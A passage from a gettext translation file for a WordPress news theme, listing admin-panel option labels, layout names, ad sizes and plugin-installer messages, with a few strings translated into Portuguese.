ratio percent (height*100/width) for featured image you would " "like. For example: 50" msgstr "" #: backend/panels/general.php:35 msgid "" "Input default placeholder text for the search form, leave blank to set it as " "the default." msgstr "" #: backend/panels/newsletter.php:42 msgid "Input description for the popup newsletter form" msgstr "" #: backend/panels/bookmark.php:112 backend/panels/bookmark.php:455 msgid "Input description for this section." msgstr "" #: backend/single-metaboxes.php:561 msgid "Input disadvantages for this review." msgstr "" #: backend/category-settings.php:488 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:513 backend/panels/blog-pages.php:1000 #: backend/panels/blog-pages.php:1414 backend/panels/blog-pages.php:1822 #: backend/panels/blog-pages.php:2314 backend/panels/bookmark.php:860 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:480 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:505 backend/panels/blog-pages.php:992 #: backend/panels/blog-pages.php:1406 backend/panels/blog-pages.php:1814 #: backend/panels/blog-pages.php:2306 backend/panels/bookmark.php:852 #: backend/panels/single-post.php:609 backend/panels/single-post.php:618 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:359 msgid "" "Input entry meta tags to show. Separated by commas (for example: author,date)" ". All meta keys include: [author, date, category, tag, view, comment, update," " read, custom]" msgstr "" #: backend/single-metaboxes.php:575 msgid "Input final summary for this review." msgstr "" #: backend/panels/typography.php:587 msgid "Input Font Settings" msgstr "" #: backend/single-metaboxes.php:757 msgid "Input Heading" msgstr "" #: backend/single-metaboxes.php:206 msgid "" "Input highlights for this post. This section will appear a the top of " "content. To edit this section heading, Navigate to Theme Options > Single " "Post > Tagline & highlights" msgstr "" #: backend/single-metaboxes.php:393 msgid "Input iframe embed code if WordPress cannot support your audio URL." msgstr "" #: backend/single-metaboxes.php:345 msgid "Input iframe embed code if WordPress cannot support your video URL." msgstr "" #: backend/panels/bookmark.php:72 msgid "" "Input max expiration (days) to save bookmarks for the guest users. Set 0 for " "no expiration." msgstr "" #: backend/panels/design.php:166 msgid "" "Input number of words per minute to calculate the reading time. Default is " "130" msgstr "" #: backend/single-metaboxes.php:599 msgid "Input the currency of the price." msgstr "" #: backend/panels/amp.php:313 backend/panels/amp.php:373 #: backend/panels/amp.php:433 backend/panels/amp.php:494 #: backend/panels/amp.php:554 msgid "Input the data-ad-client number ID (without ca-pub-)." msgstr "" #: backend/panels/amp.php:321 backend/panels/amp.php:381 #: backend/panels/amp.php:441 backend/panels/amp.php:502 #: backend/panels/amp.php:562 msgid "Input the data-ad-slot number ID." msgstr "" #: backend/single-metaboxes.php:587 msgid "Input the destination URL of the offer." msgstr "" #: backend/panels/bookmark.php:478 msgid "Input the follow page URL for user can redirect to add their interests." msgstr "" #: backend/panels/header.php:157 backend/panels/header.php:389 msgid "" "Input the footer copyright text to display at the bottom of this section, " "allow raw HTML." msgstr "" #: backend/single-metaboxes.php:751 msgid "" "Input the heading for each page corresponding to the page break tags. Please " "input all headings for pages to show the section." msgstr "" #: backend/panels/table-contents.php:133 msgid "Input the heading for the table of contents box." msgstr "" #: backend/panels/design.php:238 msgid "Input the label for this meta." msgstr "" #: backend/panels/socials.php:190 backend/panels/socials.php:217 #: backend/panels/socials.php:244 msgid "Input the name of font icon, for example: \"fab fa-facebook\"." msgstr "" #: backend/panels/socials.php:184 backend/panels/socials.php:211 #: backend/panels/socials.php:238 msgid "Input the name of the social, for example: facebook, twitter." msgstr "" #: backend/single-metaboxes.php:772 msgid "" "Input the post source if it has, it will display at the bottom of post " "content" msgstr "" #: backend/single-metaboxes.php:793 msgid "" "Input the post via if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:593 msgid "Input the price of the offer." msgstr "" #: backend/panels/design.php:544 msgid "" "Input the read more label to display on your website. Default is \"Read " "More\"." msgstr "" #: backend/panels/bookmark.php:64 msgid "" "Input the redirect URL when user logged. Leave this option blank to set the " "default value." msgstr "" #: backend/single-metaboxes.php:630 msgid "Input the sponsor brand name for this post" msgstr "" #: backend/single-metaboxes.php:623 msgid "Input the sponsor website URL." msgstr "" #: backend/panels/newsletter.php:35 msgid "Input title for the popup newsletter form" msgstr "" #: backend/single-metaboxes.php:290 msgid "" "Input value or text for the custom meta that you created in Theme Options " "panel." msgstr "" #: backend/panels/single-post.php:349 msgid "Input your a description for your newsletter." msgstr "" #: backend/panels/single-post.php:342 msgid "Input your a heading for your newsletter section." msgstr "" #: backend/panels/single-post.php:356 msgid "" "Input your a newsletter (subscribe) shortcode or script to show at bottom " "entry content." msgstr "" #: backend/panels/ads.php:194 backend/panels/ads.php:383 msgid "Input your ad destination URL." msgstr "" #: backend/panels/ads.php:123 msgid "Input your ad script code." msgstr "" #: backend/panels/header.php:667 msgid "Input your alert content to show." msgstr "" #: backend/panels/header.php:674 msgid "Input your alert URL." msgstr "" #: backend/panels/amp.php:262 msgid "Input your amp auto ads code." msgstr "" #: backend/panels/amp.php:341 backend/panels/amp.php:401 #: backend/panels/amp.php:461 backend/panels/amp.php:522 #: backend/panels/amp.php:582 msgid "Input your AMP custom ad script." msgstr "" #: backend/single-metaboxes.php:387 msgid "" "Input your audio URL, support: SoundCloud, MixCloud. Do not forget to check " "\"Audio\" in Post Format section." msgstr "" #: backend/panels/ads.php:50 msgid "Input your auto ads code." msgstr "" #: backend/panels/optimized.php:203 msgid "input your company city and country address." msgstr "" #: backend/panels/optimized.php:217 msgid "input your company local postal code." msgstr "" #: backend/panels/optimized.php:196 msgid "input your company main email." msgstr "" #: backend/panels/optimized.php:189 msgid "input your company phone number." msgstr "" #: backend/panels/optimized.php:210 msgid "input your company street address." msgstr "" #: backend/panels/footer.php:192 msgid "input your copyright text or HTML." msgstr "" #: backend/panels/ads.php:312 msgid "Input your custom ad script code or Adsense." msgstr "" #: backend/panels/design.php:245 msgid "" "Input your custom CSS icon classname to display at the beginning of the meta." msgstr "" #: backend/panels/blog-pages.php:2412 msgid "" "Input your description for the 404 page. Leave this option blank to set it " "as the default." msgstr "" #: backend/panels/optimized.php:245 msgid "input your facebook app ID for OG tags." msgstr "" #: backend/panels/single-post.php:363 msgid "Input your policy text for the newsletter form, row HTML allowed." msgstr "" #: backend/panels/privacy.php:34 msgid "Input your privacy or cookie content for your website, allow raw HTML." msgstr "" #: backend/panels/socials.php:29 backend/panels/socials.php:36 #: backend/panels/socials.php:43 backend/panels/socials.php:50 #: backend/panels/socials.php:56 backend/panels/socials.php:63 #: backend/panels/socials.php:69 backend/panels/socials.php:75 #: backend/panels/socials.php:81 backend/panels/socials.php:87 #: backend/panels/socials.php:93 backend/panels/socials.php:99 #: backend/panels/socials.php:105 backend/panels/socials.php:111 #: backend/panels/socials.php:117 backend/panels/socials.php:123 #: backend/panels/socials.php:129 backend/panels/socials.php:135 #: backend/panels/socials.php:141 backend/panels/socials.php:147 #: backend/panels/socials.php:153 msgid "Input your social profile URL, Leave blank if you want to disable it." msgstr "" #: backend/panels/socials.php:178 backend/panels/socials.php:205 #: backend/panels/socials.php:232 msgid "Input your social profile URL." msgstr "" #: backend/panels/woocommerce.php:61 msgid "" "Input your template shortcode you would like to use Elementor builder to " "create a featured section at the top of shop page." msgstr "" #: backend/panels/footer.php:122 msgid "Input your template shortcode you would like to use Elementor builder." msgstr "" #: backend/single-metaboxes.php:332 msgid "Input your video link, support: Youtube, Vimeo, DailyMotion." msgstr "" #: backend/panels/typography.php:578 msgid "Inputs & Button" msgstr "" #: templates/parts.php:603 msgid "Instagram" msgstr "" #: backend/panels/socials.php:49 msgid "Instagram URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: backend/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:340 backend/install-plugins.php:67 msgid "Install Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:339 backend/install-plugins.php:66 msgid "Install Required Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:2413 msgid "Installed But Not Activated" msgstr "" #: backend/class-tgm-plugin-activation.php:2584 msgid "Installed version:" msgstr "" #: backend/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:342 backend/install-plugins.php:68 #, php-format msgid "Installing Plugin: %s" msgstr "" #: backend/panels/logo.php:159 msgid "iOS Bookmarklet Icon" msgstr "" #: backend/single-metaboxes.php:276 msgid "" "It is useful in case this post has a lot of categories and you want to " "display only one in listings." msgstr "" #: templates/blog.php:19 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "" #: templates/page.php:124 msgid "" "It looks like nothing was found at this location. The page you were looking " "for does not exist or was loading incorrectly." msgstr "" #: templates/blog.php:501 msgid "" "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "" "Parece que não conseguimos encontrar o que você está procurando. Talvez " "pesquisar possa ajudar." #: backend/panels/footer.php:55 msgid "It will be helpful if you have not set up footer background." msgstr "" #: backend/single-metaboxes.php:552 backend/single-metaboxes.php:566 msgid "Item" msgstr "" #: backend/single-metaboxes.php:521 msgid "Item Label" msgstr "" #: backend/panels/optimized.php:144 msgid "ItemList (Carousel) Markup" msgstr "" #: backend/panels/newsletter.php:36 msgid "Join Us!" msgstr "" #: backend/panels/reaction.php:53 msgid "Joy" msgstr "" #: includes/fallbacks.php:167 msgid "k" msgstr "" #: backend/configs.php:857 msgid "Large Leaderboard (970x90)" msgstr "" #: backend/configs.php:853 msgid "Large Rectangle (336x280)" msgstr "" #: backend/panels/single-post.php:632 backend/panels/single-post.php:638 msgid "Last Updated Date" msgstr "" #: includes/menu.php:325 templates/header/templates.php:727 msgid "Latest News" msgstr "" #: backend/category-settings.php:177 backend/panels/blog-pages.php:195 msgid "Latest Posts - Heading" msgstr "" #: backend/category-settings.php:233 backend/panels/blog-pages.php:244 msgid "Latest Posts - Layout" msgstr "" #: backend/category-settings.php:213 backend/panels/blog-pages.php:541 msgid "Latest Posts - Pagination" msgstr "" #: backend/category-settings.php:290 backend/panels/blog-pages.php:298 msgid "Latest Posts - Sidebar" msgstr "" #: backend/panels/bookmark.php:589 msgid "Layout" msgstr "" #: backend/panels/table-contents.php:110 backend/single-metaboxes.php:722 msgid "layout" msgstr "" #: backend/configs.php:107 backend/configs.php:638 backend/configs.php:697 #: backend/configs.php:736 backend/configs.php:775 msgid "Layout 1" msgstr "" #: backend/configs.php:120 msgid "Layout 1 - Center" msgstr "" #: backend/configs.php:116 msgid "Layout 10" msgstr "" #: backend/configs.php:129 msgid "Layout 10 - Center" msgstr "" #: backend/configs.php:117 msgid "Layout 11" msgstr "" #: backend/configs.php:130 msgid "Layout 11 - Center" msgstr "" #: backend/configs.php:118 msgid "Layout 12" msgstr "" #: backend/configs.php:131 msgid "Layout 12 - Center" msgstr "" #: backend/configs.php:119 msgid "Layout 13" msgstr "" #: backend/configs.php:132 msgid "Layout 13 - Center" msgstr "" #: backend/configs.php:108 backend/configs.php:642 backend/configs.php:701 #: backend/configs.php:740 backend/configs.php:779 msgid "Layout 2" msgstr "" #: backend/configs.php:121 msgid "Layout 2 - Center" msgstr "" #: backend/configs.php:109 backend/configs.php:646 backend/configs.php:705 #: backend/configs.php:744 backend/configs.php:783 msgid "Layout 3" msgstr "" #: backend/configs.php:122 msgid "Layout 3 - Center" msgstr "" #: backend/configs.php:110 backend/configs.php:650 backend/configs.php:709 #: backend/configs.php:748 msgid "Layout 4" msgstr "" #: backend/configs.php:123 msgid "Layout 4 - Center" msgstr "" #: backend/configs.php:111 backend/configs.php:654 msgid "Layout 5" msgstr "" #: backend/configs.php:124 msgid "Layout 5 - Center" msgstr "" #: backend/configs.php:112 backend/configs.php:658 msgid "Layout 6" msgstr "" #: backend/configs.php:125 msgid "Layout 6 - Center" msgstr "" #: backend/configs.php:113 backend/configs.php:662 msgid "Layout 7" msgstr "" #: backend/configs.php:126 msgid "Layout 7 - Center" msgstr "" #: backend/configs.php:114 backend/configs.php:666 msgid "Layout 8" msgstr "" #: backend/configs.php:127 msgid "Layout 8 - Center" msgstr "" #: backend/configs.php:115 msgid "Layout 9" msgstr "" #: backend/configs.php:128 msgid "Layout 9 - Center" msgstr "" #: backend/panels/login.php:20 backend/panels/table-contents.php:105 msgid "Layout Settings" msgstr "" #: backend/panels/single-post.php:28 msgid "Layouts" msgstr "" #: backend/panels/optimized.php:27 msgid "Lazy Load Featured Image" msgstr "" #: backend/configs.php:842 msgid "Leaderboard (728x90)" msgstr "" #: includes/actions.php:55 templates/single/review-comment.php:97 #: templates/single/templates.php:906 msgid "Leave a comment" msgstr "Deixe um comentário" #: templates/single/review-comment.php:50 msgid "Leave a reply" msgstr "" #: templates/single/review-comment.php:49 templates/single/templates.php:883 msgid "Leave a review" msgstr "" #: backend/panels/amp.php:287 msgid "Leave blank AMP auto ads if you would like to use the ad units." msgstr "" #: backend/panels/footer.php:115 backend/panels/footer.php:215 msgid "" "Leave blank if you use the \"Archive & Menu Widgets\" font size setting." msgstr "" #: backend/panels/blog-pages.php:694 msgid "" "Leave this option blank if you want to use standard blog layout settings." msgstr "" #: backend/panels/block-classic.php:92 backend/panels/block-grid.php:92 #: backend/panels/block-grid.php:257 backend/panels/block-grid.php:422 #: backend/panels/block-grid.php:595 backend/panels/block-grid.php:782 #: backend/panels/block-list.php:100 backend/panels/block-list.php:273 #: backend/panels/block-list.php:454 backend/panels/block-list.php:649 #: backend/panels/blog-pages.php:437 backend/panels/blog-pages.php:924 #: backend/panels/blog-pages.php:1338 backend/panels/blog-pages.php:1746 #: backend/panels/blog-pages.php:2238 backend/panels/bookmark.php:336 #: backend/panels/bookmark.php:784 msgid "Leave this option blank or set 0 to disable." msgstr "" #: backend/panels/login.php:59 msgid "Leave this option blank to redirect to the homepage." msgstr "" #: backend/panels/login.php:105 backend/panels/login.php:113 msgid "Leave this option blank to set the default value." msgstr "" #: backend/panels/ads.php:53 msgid "Leave this option blank to use unit ads code." msgstr "" #: backend/configs.php:175 backend/configs.php:544 backend/configs.php:823 msgid "Left" msgstr "" #: backend/configs.php:336 msgid "Left Dot" msgstr "" #: backend/panels/footer.php:46 msgid "Left Dotted Style" msgstr "" #: backend/panels/header.php:343 msgid "Left Logo" msgstr "" #: backend/panels/header.php:345 msgid "Left Logo 2" msgstr "" #: backend/mega-menu.php:156 backend/panels/footer.php:66 #: backend/panels/header-style.php:92 backend/panels/header-style.php:380 #: backend/panels/header-style.php:647 backend/panels/header.php:289 msgid "Light Text" msgstr "" #: backend/panels/design.php:574 msgid "Link Hover Effect" msgstr "" #: backend/panels/single-post.php:759 backend/panels/single-post.php:898 #: backend/panels/single-post.php:1036 backend/panels/single-post.php:1665 #: templates/parts.php:606 msgid "LinkedIn" msgstr "" #: backend/panels/socials.php:62 msgid "LinkedIn URL" msgstr "" #: backend/panels/block-list.php:27 backend/panels/block-list.php:200 msgid "list" msgstr "" #: backend/category-settings.php:249 msgid "List 1" msgstr "" #: backend/configs.php:471 backend/panels/block-list.php:17 msgid "List 1 (Standard)" msgstr "" #: backend/category-settings.php:250 backend/configs.php:475 #: backend/panels/block-list.php:190 msgid "List 2" msgstr "" #: templates/single/templates.php:1341 msgid "List of Images" msgstr "" #: backend/panels/header.php:215 msgid "Live Search Result" msgstr "" #: backend/panels/design.php:711 msgid "Load Font Awesome" msgstr "" #: backend/panels/design.php:712 msgid "" "Load font Awesome icons library to your website. This will help you can " "embed this font icons to your widgets and content." msgstr "" #: backend/panels/design.php:706 msgid "" "Load font Awesome icons library. Enabling this option may affect to the site " "performance." msgstr "" #: backend/configs.php:562 backend/panels/bookmark.php:574 msgid "Load More (Ajax)" msgstr "" #: backend/panels/optimized.php:202 msgid "Locality Address" msgstr "" #: backend/panels/login.php:36 msgid "Login Form Position" msgstr "" #: backend/panels/login.php:51 msgid "Login Logo" msgstr "" #: backend/panels/bookmark.php:63 backend/panels/header.php:588 #: backend/panels/login.php:103 msgid "Login Redirect URL" msgstr "" #: backend/panels/login.php:12 msgid "Login Screen" msgstr "" #: backend/panels/login.php:66 msgid "Login Screen Background" msgstr "" #: backend/panels/login.php:79 msgid "Login Screen Color" msgstr "" #: backend/panels/logo.php:16 msgid "Logo" msgstr "" #: backend/panels/login.php:57 msgid "Logo - Destination URL" msgstr "" #: backend/panels/amp.php:97 backend/panels/footer.php:158 msgid "Logo Height" msgstr "" #: backend/panels/header-style.php:368 backend/panels/header-style.php:635 msgid "Logo Max Height" msgstr "" #: backend/panels/header.php:618 backend/panels/login.php:111 msgid "Logout Redirect URL" msgstr "" #: templates/popup.php:208 msgid "Lost your password?" msgstr "" #: backend/panels/reaction.php:42 msgid "Love" msgstr "" #: includes/fallbacks.php:165 msgid "M" msgstr "" #: backend/panels/logo.php:46 msgid "Main Logo" msgstr "" #: backend/panels/typography.php:902 functions.php:56 #: templates/header/templates.php:241 msgid "Main Menu" msgstr "" #: templates/header/templates.php:248 msgid "main menu" msgstr "" #: backend/panels/sidebar.php:48 msgid "Making sidebars permanently visible when scrolling up and down." msgstr "" #: backend/category-settings.php:312 msgid "Making this sidebar permanently visible when scrolling up and down." msgstr "" #: backend/mega-menu.php:288 includes/fallbacks.php:274 msgid "Manage Locations" msgstr "" #: backend/panels/page.php:42 backend/panels/single-post.php:182 #: backend/single-metaboxes.php:69 msgid "Max Width Content without Sidebar" msgstr "" #: backend/panels/design.php:68 msgid "Maximum Entry Categories" msgstr "" #: backend/configs.php:852 msgid "Medium Rectangle (300x250)" msgstr "" #: backend/mega-menu.php:124 backend/mega-menu.php:165 msgid "Mega Menu" msgstr "" #: backend/panels/header-style.php:88 backend/panels/header-style.php:376 #: backend/panels/header-style.php:643 msgid "Mega Menu - Text Color Scheme" msgstr "" #: backend/panels/typography.php:908 msgid "Menu Font" msgstr "" #: backend/panels/design.php:592 msgid "Menu Hover Effect" msgstr "" #: backend/mega-menu.php:234 msgid "Menu Icon" msgstr "" #: backend/single-metaboxes.php:540 msgid "Meta Description" msgstr "" #: backend/panels/design.php:244 msgid "Meta Icon ClassName" msgstr "" #: backend/panels/design.php:237 msgid "Meta Label" msgstr "" #: backend/panels/design.php:254 msgid "Meta Label Position" msgstr "" #: backend/panels/logo.php:167 msgid "Metro UI Bookmarklet Icon" msgstr "" #: backend/panels/header.php:729 msgid "Mini Cart" msgstr "" #: backend/class-tgm-plugin-activation.php:2592 msgid "Minimum required version:" msgstr "" #: backend/panels/color.php:118 msgid "Miscellaneous" msgstr "" #: backend/category-settings.php:487 backend/panels/block-classic.php:147 #: backend/panels/block-grid.php:147 backend/panels/block-grid.php:312 #: backend/panels/block-grid.php:477 backend/panels/block-grid.php:650 #: backend/panels/block-grid.php:837 backend/panels/block-list.php:155 #: backend/panels/block-list.php:328 backend/panels/block-list.php:509 #: backend/panels/block-list.php:704 backend/panels/blog-pages.php:512 #: backend/panels/blog-pages.php:999 backend/panels/blog-pages.php:1413 #: backend/panels/blog-pages.php:1821 backend/panels/blog-pages.php:2313 #: backend/panels/bookmark.php:859 backend/panels/single-post.php:608 #: backend/panels/single-post.php:617 msgid "Mobile - Hide Entry Meta" msgstr "" #: backend/category-settings.php:457 backend/panels/blog-pages.php:482 #: backend/panels/blog-pages.php:969 backend/panels/blog-pages.php:1383 #: backend/panels/blog-pages.php:1791 backend/panels/blog-pages.php:2283 #: backend/panels/bookmark.php:381 backend/panels/bookmark.php:829 msgid "Mobile - Title Font Size" msgstr "" #: backend/configs.php:859 msgid "Mobile Banner (320x100)" msgstr "" #: backend/configs.php:856 msgid "Mobile Banner (320x50)" msgstr "" #: backend/panels/typography.php:52 backend/panels/typography.php:98 #: backend/panels/typography.php:147 backend/panels/typography.php:196 #: backend/panels/typography.php:245 backend/panels/typography.php:294 #: backend/panels/typography.php:343 backend/panels/typography.php:392 #: backend/panels/typography.php:441 backend/panels/typography.php:507 #: backend/panels/typography.php:555 backend/panels/typography.php:610 #: backend/panels/typography.php:653 backend/panels/typography.php:729 #: backend/panels/typography.php:786 backend/panels/typography.php:870 #: backend/panels/typography.php:1056 backend/panels/typography.php:1128 msgid "Mobile Font Size" msgstr "" #: backend/configs.php:860 msgid "Mobile Friendly (300x100)" msgstr "" #: backend/panels/header.php:306 msgid "Mobile Header" msgstr "" #: backend/panels/header.php:746 msgid "Mobile Header - Mini Cart" msgstr "" #: backend/panels/header.php:237 msgid "Mobile Header - Search Icon" msgstr "" #: backend/panels/header.php:540 msgid "Mobile Header - Sign In" msgstr "" #: backend/panels/header.php:402 msgid "Mobile Header Colors" msgstr "" #: backend/panels/header.php:340 msgid "Mobile Header Layout" msgstr "" #: backend/panels/header.php:333 msgid "Mobile Header Style" msgstr "" #: backend/panels/logo.php:95 msgid "Mobile Logo" msgstr "" #: backend/panels/logo.php:85 msgid "Mobile Logos" msgstr "" #: backend/panels/typography.php:947 functions.php:57 #: templates/header/templates.php:609 msgid "Mobile Menu" msgstr "" #: backend/panels/typography.php:953 msgid "Mobile Menu Font" msgstr "" #: backend/panels/header.php:353 msgid "Mobile Navigation Height" msgstr "" #: backend/panels/typography.php:992 functions.php:58 msgid "Mobile Quick Access" msgstr "" #: backend/panels/typography.php:998 msgid "Mobile Quick Access Menu Font" msgstr "" #: backend/panels/color.php:102 msgid "Mode Switcher - Dark Icon Background" msgstr "" #: backend/panels/color.php:94 msgid "Mode Switcher - Light Icon Color" msgstr "" #: templates/header/templates.php:421 msgid "More" msgstr "" #: backend/panels/header.php:222 msgid "More Menu - Search Form" msgstr "" #: backend/panels/header-style.php:29 backend/panels/header-style.php:323 #: backend/panels/header-style.php:574 msgid "More Menu Button" msgstr "" #: backend/panels/header.php:112 msgid "More Menu Item" msgstr "" #: includes/sidebars.php:86 msgid "More Menu Section" msgstr "" #: backend/panels/header.php:208 msgid "More Menu Triggered" msgstr "" #: templates/ajax.php:186 msgid "More Results" msgstr "Mais resultados" #: templates/parts.php:621 msgid "Myspace" msgstr "" #: backend/panels/socials.php:92 msgid "Myspace URL" msgstr "" #: backend/panels/login.php:96 msgid "Navigate to \"Header > Popup Sign In\" to set for the popup login form." msgstr "" #: backend/panels/blog-pages.php:229 msgid "" "Navigate to \"Heading Design\" panel to edit font size for table and mobile " "device." msgstr "" #: backend/panels/heading.php:42 msgid "" "Navigate to \"Typography Settings > Block Heading\" to set the font values." msgstr "" #: backend/panels/footer.php:201 msgid "" "Navigate to Typography > Archive & Menu Widgets > Footer Menus to set the " "font values." msgstr "" #: backend/panels/header-style.php:112 backend/panels/header-style.php:400 #: backend/panels/header-style.php:480 backend/panels/header-style.php:667 #: backend/panels/header-style.php:746 msgid "Navigation Background" msgstr "" #: backend/panels/blog-pages.php:45 backend/panels/blog-pages.php:611 #: backend/panels/blog-pages.php:1929 backend/panels/header-style.php:68 #: backend/panels/header-style.php:345 backend/panels/header-style.php:613 #: backend/single-metaboxes.php:129 backend/single-metaboxes.php:906 msgid "Navigation Bar Style" msgstr "" #: backend/panels/header-style.php:51 backend/panels/header-style.php:596 msgid "Navigation Bar Style & Layout" msgstr "" #: backend/panels/header-style.php:106 backend/panels/header-style.php:394 #: backend/panels/header-style.php:661 msgid "Navigation Colors" msgstr "" #: backend/panels/header-style.php:361 backend/panels/header-style.php:628 msgid "Navigation Height" msgstr "" #: backend/mega-menu.php:210 msgid "Navigation Sub Label" msgstr "" #: templates/parts.php:395 msgid "Newer Articles" msgstr "" #: comments.php:26 msgid "Newer Comments →" msgstr "" #: templates/single/review-comment.php:37 msgid "Newer Reviews" msgstr "" #: backend/panels/single-post.php:348 msgid "Newsletter Description" msgstr "" #: templates/blocks/newsletter.php:42 templates/blocks/newsletter.php:44 #: templates/blocks/newsletter.php:47 templates/blocks/newsletter.php:106 #: templates/blocks/newsletter.php:108 templates/blocks/newsletter.php:111 msgid "newsletter featured" msgstr "" #: backend/panels/single-post.php:341 msgid "Newsletter Heading" msgstr "" #: backend/panels/newsletter.php:48 backend/panels/single-post.php:355 msgid "Newsletter Shortcode" msgstr "" #: templates/parts.php:349 msgid "Next" msgstr "" #: templates/single/templates.php:1029 msgid "Next Article" msgstr "" #: templates/single/templates.php:580 msgid "Next Page" msgstr "" #: backend/panels/single-post.php:1372 msgid "Next Prev" msgstr "" #: backend/panels/single-post.php:401 msgid "Next/Prev - Mobile Hide" msgstr "" #: backend/panels/amp.php:204 msgid "Next/Prev Articles" msgstr "" #: backend/panels/single-post.php:392 msgid "Next/Prev Post Pagination" msgstr "" #: backend/class-tgm-plugin-activation.php:402 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: backend/panels/design.php:677 msgid "No Border" msgstr "" #: backend/configs.php:670 msgid "No Featured" msgstr "" #: templates/parts.php:114 msgid "" "No found posts, Please add a new post for this query or change the block " "settings: " msgstr "" #: backend/configs.php:525 msgid "No Gap" msgstr "" #: backend/panels/page.php:35 backend/single-metaboxes.php:63 msgid "No Header" msgstr "" #: backend/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2627 msgid "No plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: backend/configs.php:168 backend/configs.php:543 msgid "No Sidebar" msgstr "" #: backend/panels/ads.php:242 msgid "No spacing" msgstr "" #: backend/panels/blog-pages.php:53 backend/panels/blog-pages.php:619 #: backend/panels/blog-pages.php:1937 backend/panels/design.php:276 #: backend/panels/header-style.php:74 backend/panels/header-style.php:622 #: backend/single-metaboxes.php:136 backend/single-metaboxes.php:913 msgid "None" msgstr "" #: backend/panels/single-post.php:212 msgid "Normal" msgstr "" #: backend/panels/single-post.php:211 msgid "Normal Italic" msgstr "" #: backend/panels/ads.php:536 msgid "Not Activate - Button Background" msgstr "" #: backend/panels/ads.php:528 msgid "Not Activate - Button Text Color" msgstr "" #: backend/class-tgm-plugin-activation.php:2409 msgid "Not Installed" msgstr "" #: templates/single/review-comment.php:93 msgid "Not that Bad" msgstr "" #: templates/blog.php:13 msgid "Nothing Found" msgstr "" #: backend/panels/header.php:261 templates/header/templates.php:694 #: templates/header/templates.php:699 msgid "Notification" msgstr "" #: backend/panels/header.php:269 msgid "Notification Section" msgstr "" #: templates/blocks/playlist.php:52 msgid "Now Playing" msgstr "" #: backend/panels/single-post.php:1361 msgid "Number of Posts" msgstr "" #: backend/configs.php:560 backend/panels/blog-pages.php:1452 #: backend/panels/blog-pages.php:1860 msgid "Numeric" msgstr "" #: backend/single-metaboxes.php:586 msgid "Offer Destination URL" msgstr "" #: backend/single-metaboxes.php:580 msgid "Offer Label" msgstr "" #: templates/popup.php:242 msgid "Okay, I'll Whitelist" msgstr "" #: templates/parts.php:398 msgid "Older Articles" msgstr "" #: templates/single/review-comment.php:36 msgid "Older Reviews" msgstr "" #: backend/category-settings.php:470 backend/category-settings.php:500 #: backend/configs.php:254 backend/panels/blog-pages.php:494 #: backend/panels/blog-pages.php:524 backend/panels/blog-pages.php:981 #: backend/panels/blog-pages.php:1011 backend/panels/blog-pages.php:1395 #: backend/panels/blog-pages.php:1425 backend/panels/blog-pages.php:1803 #: backend/panels/blog-pages.php:1833 backend/panels/blog-pages.php:2295 #: backend/panels/blog-pages.php:2325 backend/panels/bookmark.php:393 #: backend/panels/bookmark.php:841 msgid "On Mobile" msgstr "" #: backend/category-settings.php:471 backend/category-settings.php:501 #: backend/configs.php:255 backend/panels/blog-pages.php:495 #: backend/panels/blog-pages.php:525 backend/panels/blog-pages.php:982 #: backend/panels/blog-pages.php:1012 backend/panels/blog-pages.php:1396 #: backend/panels/blog-pages.php:1426 backend/panels/blog-pages.php:1804 #: backend/panels/blog-pages.php:1834 backend/panels/blog-pages.php:2296 #: backend/panels/blog-pages.php:2326 backend/panels/bookmark.php:394 #: backend/panels/bookmark.php:842 msgid "On Tablet" msgstr "" #: backend/category-settings.php:472 backend/category-settings.php:502 #: backend/configs.php:256 backend/panels/blog-pages.php:496 #: backend/panels/blog-pages.php:526 backend/panels/blog-pages.php:983 #: backend/panels/blog-pages.php:1013 backend/panels/blog-pages.php:1397 #: backend/panels/blog-pages.php:1427 backend/panels/blog-pages.php:1805 #: backend/panels/blog-pages.php:1835 backend/panels/blog-pages.php:2297 #: backend/panels/blog-pages.php:2327 backend/panels/bookmark.php:395 #: backend/panels/bookmark.php:843 msgid "On Tablet & Mobile" msgstr "" #: includes/sidebars.php:106 includes/sidebars.php:115 #: includes/sidebars.php:124 includes/sidebars.php:134 #: includes/sidebars.php:145 msgid "one of the columns of the footer area." msgstr "" #: backend/theme-options.php:224 msgid "Online Documentation" msgstr "" #: backend/panels/blog-pages.php:1901 msgid "Only display posts in the 